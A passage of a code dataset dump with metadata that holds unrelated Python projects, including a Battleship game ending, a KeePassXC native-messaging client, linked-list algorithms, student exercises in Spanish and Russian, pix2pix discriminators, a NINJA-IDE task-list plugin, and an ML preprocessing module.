'.join('{}'.format(i) for i in range(len(self.board))))\n for row_label in self.board.keys():\n print('{} '.format(row_label) + ' '.join(self.board[row_label]))\n print()\n\n ########## DO NOT EDIT #########\n\n\ndef end_program():\n \"\"\"Prompts the user with \"Play again (Y/N)?\" The question is repeated\n until the user enters a valid response (Y/y/N/n). The function returns\n False if the user enters 'Y' or 'y' and returns True if the user enters\n 'N' or 'n'.\n\n :return response: boolean indicating whether to end the program\n \"\"\"\n\n answers = ('Y', 'y', 'N', 'n')\n user = ''\n while user not in answers:\n user = input(\"Play again (Y/N)? \")\n print()\n\n if user == 'N' or user == 'n':\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"Executes one or more games of Battleship.\"\"\"\n\n play_battleship()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jenna-03/Python-Projects","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2934427467","text":"import json\nimport base64 as b64\nfrom subprocess import Popen, PIPE, STDOUT\nimport struct\nfrom typing import Dict, List\n\nimport nacl.utils\nfrom nacl import encoding\nfrom nacl.public import PrivateKey, PublicKey, Box\nfrom uuid import uuid1\n\n\n\nclass KeePassError(Exception):\n def __init__(self, error_code: int, message: str):\n self.error_code = error_code\n self.message = message\n\n\nclass Kpxcnm:\n CLIENT_ID_SIZE = 24\n NONCE_SIZE = 24\n\n def __init__(self, privkey: PrivateKey = None, db_id: str = None):\n if privkey is None:\n self.privkey = PrivateKey.generate()\n else:\n self.privkey = privkey\n self.db_id = db_id\n self.db_pubkey = None\n self.kp_box = None\n self.client_id = self._to_b64_str(\n nacl.utils.random(self.CLIENT_ID_SIZE))\n self.pubkey = self.privkey\\\n .public_key.encode(encoding.Base64Encoder)\\\n .decode('UTF-8')\n self.kpxc_proxy = Popen('keepassxc-proxy', stdout=PIPE,\n stdin=PIPE, stderr=STDOUT)\n\n @staticmethod\n def _to_b64_str(bytedata: bytes) -> str:\n return b64.b64encode(bytedata).decode('UTF-8')\n\n @staticmethod\n def _from_b64_str(string: str) -> bytes:\n return b64.b64decode(string.encode('UTF-8'))\n\n def _gen_nonce(self) -> str:\n return self._to_b64_str(nacl.utils.random(self.NONCE_SIZE))\n\n def _send_message(self, message) -> None:\n message = json.dumps(message).encode('UTF-8')\n self.kpxc_proxy.stdin.write(struct.pack('I', len(message)))\n self.kpxc_proxy.stdin.write(message)\n self.kpxc_proxy.stdin.flush()\n\n def _read_message(self) -> Dict[str, str]:\n txt_len_b = self.kpxc_proxy.stdout.read(4)\n if txt_len_b == 0:\n return None\n txt_len = struct.unpack('i', txt_len_b)[0]\n return json.loads(\n self.kpxc_proxy.stdout.read(txt_len).decode('UTF-8'))\n\n def _decrypt_message(self, message: Dict[str, str]) -> Dict[str, str]:\n return json.loads(self.kp_box.decrypt(\n self._from_b64_str(message['message']),\n self._from_b64_str(message['nonce'])).decode('UTF-8'))\n\n def _send_encrypted_message(self, message: Dict[str, str],\n trigger_unlock: bool) -> None:\n nonce = nacl.utils.random(self.NONCE_SIZE)\n self._send_message({\n 'action': message['action'],\n 'message': self._to_b64_str(self.kp_box.encrypt(\n json.dumps(message).encode('UTF-8'), nonce).ciphertext),\n 'nonce': self._to_b64_str(nonce),\n 'clientID': self.client_id,\n 'triggerUnlock': 'true' if trigger_unlock else 'false'\n })\n\n def read_message(self) -> Dict[str, str]:\n message = self._read_message()\n if 'error' in message:\n raise KeePassError(int(message['errorCode']), message['error'])\n if 'message' in message:\n message = self._decrypt_message(message)\n return message\n\n def change_public_keys(self) -> bool:\n self._send_message({\n 'action': 'change-public-keys',\n 'publicKey': self.pubkey,\n 'nonce': self._gen_nonce(),\n 'clientID': self.client_id\n })\n response = self.read_message()\n is_success = response['success'] == 'true'\n if is_success:\n self.db_pubkey = PublicKey(\n response['publicKey'].encode('UTF-8'),\n encoding.Base64Encoder)\n self.kp_box = Box(self.privkey, self.db_pubkey)\n return is_success\n return False\n\n def get_databasehash(self, trigger_unlock: bool = False) -> str:\n self._send_encrypted_message({\n 'action': 'get-databasehash'\n }, trigger_unlock)\n response = self.read_message()\n if response['success'] == 'true':\n return response['hash']\n\n def associate(self, id_key: str = \"\",\n trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'associate',\n 'key': self.pubkey,\n 'idKey': id_key\n }, trigger_unlock)\n response = self.read_message()\n is_success = response['success'] == 'true'\n if is_success:\n self.db_id = response['id']\n return is_success\n\n def test_associate(self, trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'test-associate',\n 'id': self.db_id,\n 'key': self.pubkey\n }, trigger_unlock)\n response = self.read_message()\n return response['success'] == 'true'\n\n def generate_password(self) -> str:\n self._send_message({\n 'action': 'generate-password',\n 'nonce': self._gen_nonce(),\n 'clientID': self.client_id\n })\n response = self.read_message()\n if response['success'] == 'true':\n return response['entries'][0]['password']\n\n def get_logins(self, url: str,\n submit_url: str = None,\n http_auth: bool = False,\n trigger_unlock: bool = False) -> List[Dict[str, str]]:\n self._send_encrypted_message({\n 'action': 'get-logins',\n 'url': url,\n 'submitUrl': url if submit_url is None else submit_url,\n 'httpAuth': 'true' if http_auth else 'false',\n 'keys': [\n {\n 'id': self.db_id,\n 'key': self.pubkey\n }\n ]\n }, trigger_unlock)\n response = self.read_message()\n if response['success'] == 'true':\n return response['entries']\n\n def set_login(self, username: str, password: str,\n url: str, group: str, group_uuid: str,\n uuid: str = None, trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'set-login',\n 'url': url,\n 'submitUrl': url,\n 'id': self.db_id,\n 'nonce': self._gen_nonce(),\n 'login': username,\n 'password': password,\n 'group': group,\n 'groupUuid': group_uuid,\n 'uuid': uuid1().hex if uuid is None else uuid\n }, trigger_unlock)\n response = self.read_message()\n return response['success'] == 'true'\n\n def get_database_groups(self, trigger_unlock: bool = False) -> Dict[str, any]:\n self._send_encrypted_message({\n 'action': 'get-database-groups'\n }, trigger_unlock)\n return self.read_message()\n\n def create_new_group(self, group_name: str, trigger_unlock: bool = False) -> str:\n self._send_encrypted_message({\n 'action': 'create-new-group',\n 'groupName': group_name\n }, trigger_unlock)\n return self.read_message()['uuid']\n\n def lock_database(self, trigger_unlock: bool = False) -> bool:\n self._send_encrypted_message({\n 'action': 'lock-database'\n }, trigger_unlock)\n self.read_message()\n return True\n\n","repo_name":"Ashymad/kpxcnm","sub_path":"kpxcnm.py","file_name":"kpxcnm.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10117695967","text":"'''\r\n\t完成以下常见链表代码\r\n\t1.单链表反转:递归与非递归\r\n \t2.链表中环的检测\r\n\t3.两个有序链表的合并\r\n\t4.删除链表倒数第n个节点\r\n\t5.求链表的中间节点\r\n'''\r\n\r\nclass Linklist(object):\r\n\tdef __init__(self,val = -1):\r\n\t\tself.val = val\r\n\t\tself.next = None\r\n\r\n\r\ndef reversed_link(l : Linklist) -> Linklist:\r\n\t'''\r\n\t\t翻转单链表\r\n\t'''\r\n\tif l.next == None or l.next.next == None:\r\n\t\treturn l.next\r\n\treversed_head = Linklist()\r\n\twhile l.next != None:\r\n\t\t# 从前向后从原链表中取出节点用头插法插入新链表中\r\n\t\ttemp = l.next\r\n\t\tl.next = l.next.next\r\n\t\ttemp.next = reversed_head.next\r\n\t\treversed_head.next = temp\r\n\treturn reversed_head\r\n\r\ndef reversed_link_iteration(l : Linklist) -> Linklist:\r\n\t\"\"\"\r\n\t\t翻转单链表:迭代\r\n\t\"\"\"\r\n\tpre,cur = None,l\r\n\twhile cur:\r\n\t\tcur.next,pre,cur = pre,cur,cur.next\r\n\treturn pre\r\n\r\ndef reversed_link_recursion(l : Linklist) -> Linklist:\r\n\t\"\"\"\r\n\t\t翻转单链表:递归\r\n\t\"\"\"\r\n\tif l is None or l.next is None:\r\n\t\treturn l\r\n\telse:\r\n\t\tnewhead = reversed_link_recursion(l.next)\r\n\t\tl.next.next = l\r\n\t\tl.next = None\r\n\t\treturn newhead\r\n\r\ndef check_loop(l : Linklist) -> bool:\r\n\t'''\r\n\t\t判断一个链表是否有环\r\n\t'''\r\n\tslow = fast = l\r\n\t# 循环判断快慢指针是否相等\r\n\twhile fast and fast.next:\r\n\t\t# 如果fast指针能够指向空值说明必没有循环\r\n\t\tslow = slow.next\r\n\t\tfast = fast.next.next\r\n\t\tif slow == fast:\r\n\t\t\treturn True\r\n\treturn False\r\n\r\ndef find_middle_node(l : Linklist) -> Linklist:\r\n\t'''\r\n\t\t找到链表的中间节点并返回,若节点数为偶数则返回中间之后的节点\r\n\t'''\r\n\tslow, fast = l.next, l.next\r\n\tfast = fast.next if fast else None\r\n\twhile fast and fast.next:\r\n\t\tslow, fast = slow.next, fast.next.next\r\n\treturn slow\r\n\r\n\r\ndef print_list(l : Linklist):\r\n\t'''\r\n\t\t打印链表\r\n\t'''\r\n\tif l.next == None:\r\n\t\treturn None\r\n\telif l.next.next == None:\r\n\t\tprint(l.next.val)\r\n\tresult = []\r\n\tcur = l.next\r\n\twhile cur != None:\r\n\t\tresult.append(cur.val)\r\n\t\tcur = cur.next\r\n\tprint('->'.join([str(x) for x in result]))\r\n\r\ndef merge_sortedList(l1: Linklist,l2: Linklist) -> Linklist:\r\n\t'''\r\n\t\t合并两个有序单链表\r\n\t'''\r\n\tif l1.next and l2.next:\r\n\t\tl3 = Linklist()\r\n\t\tcur = l3\r\n\t\tl1, l2 = l1.next, l2.next\r\n\t\twhile l1 and l2:\r\n\t\t\tif l1.val <= l2.val:\r\n\t\t\t\tcur.next = l1\r\n\t\t\t\tl1 = l1.next\r\n\t\t\telse:\r\n\t\t\t\tcur.next = l2\r\n\t\t\t\tl2 = l2.next\r\n\t\t\tcur = cur.next\r\n\t\tcur.next = l1 if l1 else l2\r\n\t\treturn l3\r\n\telse:\r\n\t\treturn l1 or l2 # 返回l1或者l2之中非空的值\r\n\r\ndef remove_nth_from_end(l: Linklist,n : int) -> Linklist:\r\n\t'''\r\n\t\t带头结点\r\n\t\t假设n是大于0的整数\r\n\t\t删除链表的倒数第n个节点\r\n\t'''\r\n\tdummyhead = l\r\n\tfast,slow = l,l\r\n\tcount = -1\r\n\twhile fast and count < n:\r\n\t\tfast = fast.next\r\n\t\tcount += 1\r\n\tif not fast and count < n:\r\n\t\tprint('not so much nodes')\r\n\t\treturn dummyhead\r\n\tif not fast and count == 0:\r\n\t\tdummyhead.next = dummyhead.next.next\r\n\t\treturn dummyhead\r\n\twhile fast:\r\n\t\tslow,fast = slow.next,fast.next\r\n\tslow.next = slow.next.next\r\n\treturn dummyhead\r\n\r\n\r\n\r\n\r\ndef main():\r\n\tl1,l2 = Linklist(),Linklist()\r\n\tcur = l1\r\n\tfor i in range(0,10,2):\r\n\t\tcur.next = Linklist(i)\r\n\t\tcur = cur.next\r\n\tcur = l2\r\n\tfor i in range(1,9,2):\r\n\t\tcur.next = Linklist(i)\r\n\t\tcur = cur.next\r\n\tprint_list(l1)\r\n\tprint_list(l2)\r\n\tl3 = merge_sortedList(l1,l2)\r\n\tprint_list(l3)\r\n\t# print('-----remove 3th from the end----')\r\n\t# print_list(remove_nth_from_end(l3,3))\r\n\tprint('---reversed the link iterable---')\r\n\tl3 = reversed_link_iteration(l3)\r\n\tprint_list(l3)\r\n\tprint('---reversed the link---')\r\n\tl3 = reversed_link_recursion(l3)\r\n\tprint_list(l3)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n\r\n\r\n\r\n\r\n\t\r\n","repo_name":"lofues/Data-Algorithm_python","sub_path":"1.LinkList/normal_algorithm_linklist.py","file_name":"normal_algorithm_linklist.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32438412129","text":"# 3. Escribe un programa que le pida al usuario si quiere calcular si un número es primo con for o con while, \n# por tanto, habrá dos funciones que se caracterizan por hacer ese mismo cálculo de una manera (con for y sin breaks),\n# o de otra (con while). Ambas funciones devolverán true (si es primo) o false (si no es primo). \n# El programa principal informará del resultado. Además, como mejora puedes calcular el tiempo que tarda \n# en encontrar la solución de una manera u otra. Comentario: aprovecha el código que tienes ya creado\n\n\nimport time\n\nbucle = input(\"¿Quieres calcular si un número es primo con for o con while? \")\n\ndef primos(bucle):\n num = int(input(\"Introduce un número: \"))\n def primo_for(num):\n primo = True\n for i in range(2, num):\n if num % i == 0:\n primo = False\n if primo:\n print(f\"El numero {num} es primo\")\n else:\n print(f\"El numero {num} no es primo\")\n def primo_while(num):\n primo = True\n i = 2\n while i < num:\n if num % i == 0:\n primo = False\n # Añadiendo 1 a i, se evita que se repita el bucle\n i = i + 1 \n if primo:\n print(f\"El numero {num} es primo\")\n else:\n print(f\"El numero {num} no es primo\")\n if bucle == \"for\" or bucle == \"For\":\n espera = time.time()\n primo_for(num)\n espera = time.time() - espera\n print(f\"El tiempo de espera es de {espera} segundos\")\n elif bucle == \"while\" or bucle == \"While\":\n espera = time.time()\n primo_while(num)\n espera = time.time() - espera\n print(f\"El tiempo de espera es de {espera} segundos\")\n else:\n print(\"No has introducido un valor correcto\")\nprimos(bucle)\n\n","repo_name":"Jouad01/PracticasPython","sub_path":"Practicas/Practica6/6B/ej3.py","file_name":"ej3.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35345995283","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPix2Pix Discriminator network definitions.\n\"\"\"\n\nimport torch.nn as nn\n\n\nclass NLayerDNet(nn.Module):\n \"\"\" PatchGAN discriminator network \n Classifies if an NxN patch of an image is real or fake\n \"\"\"\n \n def __init__(self, cfg, inp_nc, norm_layer=nn.BatchNorm2d, use_bias=False):\n \n super(NLayerDNet, self).__init__()\n \n ndf = cfg.ndf \n ks = 4 #4x4 filter\n pw = 1 #pad width\n activation = nn.LeakyReLU(0.2, True)\n layers = [nn.Conv2d(inp_nc, ndf, kernel_size=ks, stride=2, padding=pw), activation]\n \n #discriminator layers \n #inp channel(3)->64->128->256->512 (3 layers for 70x70 PatchGAN)\n #inp channel(3)->64->128 (1 layer for 16x16 PatchGAN)\n #inp channel(3)->64->128->256->512->512->512 (5 layers for 286x286 PatchGAN)\n mult_prev = 1\n for i in range(1, cfg.nlayers_d): #3 for default PatchGAN\n mult = min(2**i, 8) \n layers += [nn.Conv2d(ndf*mult_prev, ndf*mult, kernel_size=ks, stride=2, padding=pw, bias=use_bias), \n norm_layer(ndf*mult), \n activation]\n mult_prev = mult\n \n #add additional layers for a n-layer PatchGAN\n mult_prev = mult \n mult = min(2**cfg.nlayers_d, 8) \n layers += [nn.Conv2d(ndf*mult_prev, ndf*mult, kernel_size=ks, stride=1, padding=pw, bias=use_bias), \n norm_layer(ndf*mult), \n activation]\n \n #final layer results in a 1-dim output\n layers += [nn.Conv2d(ndf*mult, 1, kernel_size=ks, stride=1, padding=pw)]\n #stack the layers of a PatchGAN\n self.model = nn.Sequential(*layers)\n \n def forward(self, inp):\n \n out = self.model(inp)\n #print(\"PatchGan out:\", inp.shape, out.shape)\n return out\n \nclass PixelDNet(nn.Module):\n \"\"\" PixelGAN discriminator network (==1x1 PatchGAN)\n Classifies if each pixel of an image is real or fake\n \"\"\"\n \n def __init__(self, cfg, inp_nc, norm_layer=nn.BatchNorm2d, use_bias=False):\n \n super(PixelDNet, self).__init__()\n \n \n ndf = cfg.ndf \n ks = 1 #1x1 spatial filter to convolve over pixels\n pw = 0 #pad width\n activation = nn.LeakyReLU(0.2, True)\n layers = [nn.Conv2d(inp_nc, ndf, kernel_size=ks, stride=1, padding=pw), activation]\n layers += [nn.Conv2d(ndf, ndf*2, kernel_size=ks, stride=1, padding=pw, bias=use_bias), \n norm_layer(ndf*2), \n activation]\n #final layer results in a 1-dim output\n layers += [nn.Conv2d(ndf*2, 1, kernel_size=ks, stride=1, padding=pw, bias=use_bias)]\n #stack the layers of a PixelGAN\n self.model = nn.Sequential(*layers)\n \n def forward(self, inp):\n \n out = self.model(inp)\n #print(\"PixelGan out\", inp.shape, out.shape)\n return out \n \n \ndef createDNet(cfg, norm_layer, use_bias):\n \"\"\" Create discriminator network \n \n 3 types of discriminator architecture are supported:\n patch (\"PatchGAN\"): divides an image into subpatches of a certain size (default 70x70). \n Each patch is classified as fake or real. Has fewer params than classifying \n the whole image.\n pixel (\"PixelGAN\"): classifies if each pixel (1x1) is fake or real.\n \"\"\"\n \n net = None\n #default PatchGAN, divides an image into subpatches of a certain size (default 70x70). \n #Each patch is classified as fake or real by DNet. The network can have the basic 3 layers \n #or multiple layers.\n #input and output channels are concatenated because the DNet processes a pair of aligned images\n #that are concatenated along the channel dim.\n if cfg.disc_net == \"basic\" or cfg.disc_net == \"nlayers\": \n net = NLayerDNet(cfg, cfg.inp_nc+cfg.out_nc, norm_layer, use_bias)\n elif cfg.disc_net == \"pixel\" : #classifies if each pixel is fake or real\n net = PixelDNet(cfg, cfg.inp_nc+cfg.out_nc, norm_layer, use_bias)\n else:\n raise NotImplementedError(\"unknown discriminator net: %s\"%cfg.disc_net) \n return net \n","repo_name":"athena913/pix2pix","sub_path":"models/dnet.py","file_name":"dnet.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6488070718","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport re\n\nfrom ninja_ide.core import plugin\nfrom PyQt4.QtCore import SIGNAL\n\nfrom PyQt4.QtGui import QIcon\nfrom PyQt4.QtGui import QAbstractItemView\nfrom PyQt4.QtGui import QHeaderView\nfrom PyQt4.QtGui import QTreeWidget\nfrom PyQt4.QtGui import QTreeWidgetItem\n\n\nclass TaskList(plugin.Plugin):\n def initialize(self):\n #get the services!\n self.main_s = self.locator.get_service('editor')\n self.explorer_s = self.locator.get_service('explorer')\n\n #explorer\n self._task_widget = TaskWidget(self.locator)\n self.explorer_s.add_tab(self._task_widget, \"Tasks\")\n\n\nclass TaskWidget(QTreeWidget):\n\n TASK_IMAGE = os.path.join(os.path.dirname(__file__), 'task.png')\n TODO_REG = re.compile(\"#(\\\\s)*TODO(\\\\s)*\\\\:(\\\\s)*.\")\n FIXME_REG = re.compile(\"#(\\\\s)*FIXME(\\\\s)*\\\\:(\\\\s)*.\")\n OPTIMIZE_REG = re.compile(\"#(\\\\s)*OPTIMIZE(\\\\s)*\\\\:(\\\\s)*.\")\n\n def __init__(self, locator):\n QTreeWidget.__init__(self)\n self.locator = locator\n self._explorer_s = self.locator.get_service('explorer')\n self._main_s = self.locator.get_service('editor')\n #on current tab changed refresh\n self._main_s.currentTabChanged.connect(self._on_tab_changed)\n #on file saved refresh\n self._main_s.fileSaved.connect(self._on_file_saved)\n\n self.header().setHidden(True)\n self.setSelectionMode(self.SingleSelection)\n self.setAnimated(True)\n self.header().setHorizontalScrollMode(QAbstractItemView.ScrollPerPixel)\n self.header().setResizeMode(0, QHeaderView.ResizeToContents)\n self.header().setStretchLastSection(False)\n\n self.connect(self, SIGNAL(\"itemClicked(QTreeWidgetItem *, int)\"),\n self._go_to_definition)\n\n def _on_tab_changed(self):\n self.refresh_tasks()\n\n def _on_file_saved(self, fileName):\n self.refresh_tasks()\n\n def refresh_tasks(self):\n editorWidget = self._main_s.get_editor()\n if editorWidget:\n source = self._main_s.get_text()\n self._parse_tasks(source)\n\n def _go_to_definition(self, item):\n #the root doesn't go to anywhere\n if item.parent() is not None:\n self._main_s.jump_to_line(item.lineno)\n\n def _parse_tasks(self, source_code):\n self.clear()\n #create roots\n todo_root = QTreeWidgetItem(self, ['TODO'])\n fixme_root = QTreeWidgetItem(self, ['FIXME'])\n optimize_root = QTreeWidgetItem(self, ['OPTIMIZE'])\n\n lines = source_code.split(\"\\n\")\n lineno = 0\n for line in lines:\n #apply the regular expressions\n todo_match = self.TODO_REG.search(line)\n fixme_match = self.FIXME_REG.search(line)\n optimize_match = self.OPTIMIZE_REG.search(line)\n if todo_match:\n content = line[todo_match.end() - 1:]\n item = TaskItem(todo_root, [content], lineno)\n item.setIcon(0, QIcon(self.TASK_IMAGE))\n elif fixme_match:\n content = line[fixme_match.end() - 1:]\n item = TaskItem(fixme_root, [content], lineno)\n item.setIcon(0, QIcon(self.TASK_IMAGE))\n elif optimize_match:\n content = line[optimize_match.end() - 1:]\n item = TaskItem(optimize_root, [content], lineno)\n item.setIcon(0, QIcon(self.TASK_IMAGE))\n\n lineno += 1\n self.expandAll()\n\n\nclass TaskItem(QTreeWidgetItem):\n\n def __init__(self, parent, content, lineno):\n QTreeWidgetItem.__init__(self, parent, content)\n self.lineno = lineno\n","repo_name":"raupulus/debian-developer-conf","sub_path":"conf/home/.ninja_ide/addins/plugins/task_list/task_list.py","file_name":"task_list.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"27"} +{"seq_id":"71807766127","text":"import cv2\r\nimport numpy as np\r\nimport sys\r\n\r\nimg = cv2.imread('assets/pic.jpg')\r\n\r\n# 1. Translation \r\n#Basically shifting an image along the X and Y axis so using translation we can shift the image up down left or right\r\ndef translate(img, x, y):\r\n #x stands for no. of pixels i want to shift along x and y stands for no. of pixels i want to shift along y axis\r\n transmat = np.float32([[1,0,x],[0,1,y]])\r\n dimensions = (img.shape[1], img.shape[0])\r\n return cv2.warpAffine(img, transmat, dimensions)\r\n\r\n# -x --> left\r\n# -y --> Up\r\n# x ---> Right\r\n# y --> Down\r\n\r\ndef asker():\r\n x_input = input('Enter the pixels count to move on X-axis : ')\r\n y_input = input('Enter the pixels count to move on Y-axis : ')\r\n translated = translate(img, x_input, y_input)\r\n cv2.imshow('translated', translated)\r\n cv2.waitKey(5)\r\n asker()\r\n\r\nasker()","repo_name":"ekanpycoderx/OpenCV-Project","sub_path":"transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42329294220","text":"import cv2\nimport os\n\nfileDirPath = './train/pos/'\nfileNames = os.listdir(fileDirPath) \n\ncountDict={}\nresolutionFileNames=[]\nfor filename in fileNames:\n\timg = cv2.imread(fileDirPath+filename)\n\trows,cols = img.shape[:2]\n\tresolutionStr = str(cols)+\"x\"+str(rows)\n\tif resolutionStr in countDict:\n\t\tcountDict[resolutionStr] = countDict[resolutionStr] + 1\n\telse:\n\t\tcountDict[resolutionStr] = 1\n\tif resolutionStr == '640x480':\n\t\tresolutionFileNames.append(filename)\nresolutionFileNames.sort()\n\n#print(countDict)\nwith open('result_data_name.txt','w') as f:\n\tfor item in resolutionFileNames:\n\t\tf.write(item+\"\\n\")\n\t\n","repo_name":"HyunminKo/HandGestureAuthentication","sub_path":"src/Data/data_info.py","file_name":"data_info.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17674217668","text":"from django.urls import path\n\nfrom usersApp import views\n\n\nurlpatterns = [\n\tpath('',views.main,name = 'user_main'),\n\tpath('main/',views.main,name = 'user_main'),\n\tpath('login/',views.log_in,name = 'user_login'),\n\tpath('registration/',views.registration,name = 'user_registration'),\n\tpath('logout/',views.log_out,name = 'user_logout'),\n\tpath('profile/',views.profile,name = 'user_profile')\n]\n","repo_name":"Delorency/django-first-app","sub_path":"usersApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25532167660","text":"#9. На входе список чисел, получить список квадратов этих чисел / use map\n\nnumbers = [1, 2, 3, 4, 5]\nprint(list(map(lambda x: x * x, numbers)))\n\n#10. На входе список координат, например, [(1, 1), (2, 3), (5, 3)]. Найти все точки, которые принадлежат прямой y = 5 * x - 2. \n#На выходе получить словарь из самой точки и расстояния до этой точки из начала координат (0, 0)\n\ncoords = [(1, 1), (2, 3), (5, 3)]\n#distance = ???\n#print(distance)\n\n#11. Возвести в квадрат все четные числа от 2 до 27. На выходе список.\n\nsquare = [x * x for x in range(2, 28) if x % 2 == 0]\nprint(square)\n\n#12. На входе список из координат точек на плоскости. Найти расстояние до самой удаленной точки от начала координат (0, 0) в первой четверти. # max()\n\npoints = [(3, 1), (4, 5), (6, 2)]\nmax_distance = max(point for point in points)\nprint(max_distance)\n\n#13. На входе два списка чисел nums_first = [1, 2, 3, 5, 8] и nums_second = [2, 4, 8, 16, 32]. Получить пары сумм и разниц, [(3, -1), (6, -2), (11, -5), ...] # list(map(..., nums_first, nums_second))\n\nnums_first = [1, 2, 3, 5, 8]\nnums_second = [2, 4, 8, 16, 32]\nresult = list(map(lambda x, y: (x + y, x - y), nums_first, nums_second))\nprint(result)\n\n#14. На входе список строк из чисел, например, ['43141', '32441', '431', '4154', '43121']. Найти четные квадраты этих чисел. Ответ записать снова в список из строк, то есть сформировать обратно список строк, но уже отфильтровать все четные квадраты.\n#print(list(map(int, \"1 2 3\".split())))\n\narray = ['43141', '32441', '4', '4154', '43121']\nnew_array = []\nresult_array = []\nfor i in range(len(array)):\n if int(array[i])**2 % 2 == 0:\n new_array.append(int(array[i]))\n result_list = list(map(lambda x: x * x, new_array))\nprint(result_list)\n\n#15. Менеджер как обычно придумал свое представление данных, а нам оно не подходит # slice, split, map, zip\n\ninput_str = \"\"\"name,Petya,Vasya,Masha,Vova\ngrade,5,5,8,3\nsubject,math,language,physics,math\nyear,1999,2000,1995,1998\"\"\"\n\n\n#Мы хотим получить нормальную таблицу, чтобы импортировать в csv\n\n#[\n# {\n# 'name': 'Petya',\n # 'grade': '5'\n # 'subject': 'math'\n # 'year': '1999'\n #},\n #{\n # 'name': 'Vasya',\n #'grade': '5'\n #'subject': 'language'\n #'year': '2000'\n # },\n #...\n#]\n\n\n#16. Получить сумму по столбцам у двумерного списка # sum, zip\n\n#a = [[11.9, 12.2, 12.9],\n# [15.3, 15.1, 15.1], \n# [16.3, 16.5, 16.5],\n # [17.7, 17.5, 18.1]]\n \n#result = [61.2, 61.3, 62.6] \n\n\n#print(list(zip(*a)))\n","repo_name":"Marshall08/HSE-python","sub_path":"Marsavin30.11 (1).py","file_name":"Marsavin30.11 (1).py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23004223929","text":"import os\nimport sys\nimport pandas as pd \nimport numpy as np \nfrom dataclasses import dataclass\nfrom src.logger import logging\nfrom src.exception import CustomException\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer #handel missing values\n#Pipline\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\n\nfrom src.utils import save_object\n\n\n@dataclass\nclass DataTransformationConfig:\n preprosser_obj_file_path = os.path.join(\"artifcats\",\"preprocessor.pkl\")\n\n\nclass DataTransformation:\n def __init__(self):\n self.data_transformation_config = DataTransformationConfig()\n\n\n def get_data_transformation_obj(self):\n try:\n logging.info(\"Data Transformation Initiated\")\n\n numerical_features = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX',\n 'PTRATIO', 'B', 'LSTAT']\n\n logging.info(\"Pipline Initiated\")\n\n # Numerical Pipline\n\n num_pipline = Pipeline(\n steps=[\n (\"imputer\",SimpleImputer(strategy=\"median\")),\n (\"scaler\",StandardScaler())\n ]\n )\n\n # Catigorical Pipline\n cato_pipline = Pipeline(\n steps=[\n (\"imputer\",SimpleImputer(strategy=\"most_frequent\")),\n (\"scaler\",StandardScaler())\n ]\n )\n\n # Columns Transformer\n preprocessor = ColumnTransformer([\n (\"num_pipline\",num_pipline,numerical_features),\n ])\n\n return preprocessor\n\n logging.info(\"Pipline Complited\")\n\n\n except Exception as e:\n logging.info(\"Error Occured in Data Transformation\")\n raise CustomException(e,sys)\n\n\n \n def initatie_data_transformation(self,train_path,test_path):\n try:\n ## Read Train and Test Data\n train_data = pd.read_csv(train_path)\n test_data = pd.read_csv(test_path)\n\n logging.info(\"Read Traning And Test Data Complited\")\n logging.info(f'Train Dataframe Head : \\n{train_data.head().to_string()}')\n logging.info(f'Test Dataframe Head : \\n{test_data.head().to_string()}')\n\n\n logging.info(\"Ontaning preprosser object\")\n\n prprocessor_obj = self.get_data_transformation_obj()\n\n target_colum_name = \"MEDV\"\n drop_columns = [target_colum_name]\n\n # this is line x & y\n input_feature_train_data = train_data.drop(drop_columns,axis=1)\n target_feature_train_data = train_data[target_colum_name]\n\n input_feature_test_data = test_data.drop(drop_columns,axis=1)\n target_feature_test_data = test_data[target_colum_name]\n\n\n ## Apply Transformation Using Preprocessor Object xtrain and xyest\n input_feature_train_arr = prprocessor_obj.fit_transform(input_feature_train_data)\n input_feature_test_arr = prprocessor_obj.transform(input_feature_test_data)\n\n logging.info(\"Applying Preprossing obj on Train and test data\")\n\n ## Convert into Array To be fast concat\n train_array = np.c_[input_feature_train_arr,np.array(target_feature_train_data)]\n test_array = np.c_[input_feature_test_arr,np.array(target_feature_test_data)]\n\n ## Calling Save object function and save preprosser pkl\n save_object(file_path=self.data_transformation_config.preprosser_obj_file_path, obj=prprocessor_obj)\n\n logging.info(\"Saving Preprocessor Pikel File\")\n\n\n return (\n train_array,\n test_array,\n self.data_transformation_config.preprosser_obj_file_path\n )\n\n \n except Exception as 